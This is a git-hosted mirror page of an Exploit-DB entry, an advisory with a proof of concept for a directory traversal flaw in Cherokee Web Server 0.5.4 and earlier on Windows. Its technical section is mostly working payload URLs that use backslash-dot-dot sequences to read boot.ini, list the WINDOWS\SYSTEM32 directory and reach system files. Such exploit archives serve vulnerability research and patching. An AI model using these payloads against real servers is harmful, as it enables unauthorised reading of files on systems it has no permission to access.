bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1
exploit-db-mirror/exploits/windows/webapps/9873.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

27 lines
No EOL
963 B
Text
Raw Blame History

############################################################
#
# Cherokee Web Server <= 0.5.4 Directory Traversal Exploit
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.cherokee-project.com/download/windows
#
############################################################
- Description -
Cherokee Web Server <= 0.5.4 is a Windows based HTTP server. This is the latest
version of the application available.
Cherokee Web Server <= 0.5.4 is vulnerable to remote directory traversal attack by the
following means.
Default webroot is C:\Program Files\Cherokee\www [3 levels deep] adjust accordingly.
- Technical Details -
http://[webserver IP]/[\../]
http://172.16.2.101/\../\../\../boot.ini
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32 <- Full Directory Listings through Browser
http://172.16.2.101/\../\../\../WINDOWS\SYSTEM32\calc.exe <- File access in context of web browser instance
#[pocoftheday.blogspot.com]
Reference in a new issue View git blame Copy permalink